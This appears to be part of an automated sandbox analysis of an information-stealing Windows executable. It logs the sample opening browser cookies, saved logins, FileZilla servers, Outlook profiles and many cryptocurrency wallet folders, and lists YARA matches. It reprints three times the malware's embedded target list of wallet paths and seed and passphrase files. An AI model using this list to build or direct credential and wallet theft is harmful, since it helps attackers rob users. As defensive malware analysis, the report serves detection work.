Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z2kQkLtyJW.exe PID: 3756, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1965368943.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268391643.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2269571809.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2269753162.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z2kQkLtyJW.exe PID: 3756, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1965368943.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268391643.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2269571809.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z2kQkLtyJW.exe PID: 3756, type: MEMORYSTR
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D150D60 sqlite3_bind_parameter_name, 0_2_6D150D60
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D150C40 sqlite3_bind_zeroblob, 0_2_6D150C40
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D078EA0 sqlite3_clear_bindings, 0_2_6D078EA0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D150B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6D150B40
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D076410 bind,WSAGetLastError, 0_2_6D076410
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs